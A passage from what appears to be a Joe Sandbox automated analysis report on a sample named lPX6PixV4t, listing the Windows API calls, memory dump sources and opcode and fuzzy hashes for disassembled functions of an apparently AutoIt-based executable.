                          • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                          • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                          • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                          • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                          APIs
                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                          • LineTo.GDI32(?,?,?), ref: 004472AC
                          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                          • LineTo.GDI32(?,?,?), ref: 004472C6
                          • EndPath.GDI32(?), ref: 004472D6
                          • StrokePath.GDI32(?), ref: 004472E4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                          • String ID:
                          • API String ID: 372113273-0
                          • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                          • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                          • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                          • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                          APIs
                          • GetDC.USER32(00000000), ref: 0044CC6D
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                          • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CapsDevice$Release
                          • String ID:
                          • API String ID: 1035833867-0
                          • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                          • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                          • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                          • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                          APIs
                          • __getptd.LIBCMT ref: 0041708E
                            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                          • __amsg_exit.LIBCMT ref: 004170AE
                          • __lock.LIBCMT ref: 004170BE
                          • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                          • _free.LIBCMT ref: 004170EE
                          • InterlockedIncrement.KERNEL32(00A82D90), ref: 00417106
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                          • String ID:
                          • API String ID: 3470314060-0
                          • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                          • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                          • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                          • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                          APIs
                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                          • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                          • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                          • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                            • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 3495660284-0
                          • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                          • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                          • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                          • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                          APIs
                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Virtual
                          • String ID:
                          • API String ID: 4278518827-0
                          • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                          • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                          • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                          • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                          APIs
                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                          • ExitThread.KERNEL32 ref: 004151ED
                          • __freefls@4.LIBCMT ref: 00415209
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                          • String ID:
                          • API String ID: 442100245-0
                          • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                          • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                          • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                          • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                          APIs
                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                          • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                          • _wcslen.LIBCMT ref: 0045F94A
                          • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                          • String ID: 0
                          • API String ID: 621800784-4108050209
                          • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                          • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                          • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                          • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                          APIs
                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                          • SetErrorMode.KERNEL32 ref: 004781CE
                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                          • SetErrorMode.KERNEL32(?), ref: 00478270
                          • SetErrorMode.KERNEL32(?), ref: 00478340
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ErrorMode$AttributesFile_memmove_wcslen
                          • String ID: \VH
                          • API String ID: 3884216118-234962358
                          • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                          • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                          • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                          • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 00434B10
                          • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                          • FreeLibrary.KERNEL32(?), ref: 00434B9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID: AU3_GetPluginDetails$#v
                          • API String ID: 145871493-3662034293
                          • Opcode ID: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                          • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                          • Opcode Fuzzy Hash: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                          • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                          APIs
                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                          • IsMenu.USER32(?), ref: 0044854D
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                          • DrawMenuBar.USER32 ref: 004485AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Menu$Item$DrawInfoInsert
                          • String ID: 0
                          • API String ID: 3076010158-4108050209
                          • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                          • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                          • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                          • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                          APIs
                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                          • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend$_memmove_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 1589278365-1403004172
                          • Opcode ID: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                          • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                          • Opcode Fuzzy Hash: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                          • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Handle
                          • String ID: nul
                          • API String ID: 2519475695-2873401336
                          • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                          • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                          • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                          • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                          APIs
                          • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Handle
                          • String ID: nul
                          • API String ID: 2519475695-2873401336
                          • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                          • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                          • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                          • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID: SysAnimate32
                          • API String ID: 0-1011021900
                          • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                          • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                          • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                          • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                          APIs
                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                            • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                            • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                            • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                          • GetFocus.USER32 ref: 0046157B
                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                          • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                          • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                          • __swprintf.LIBCMT ref: 00461608
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
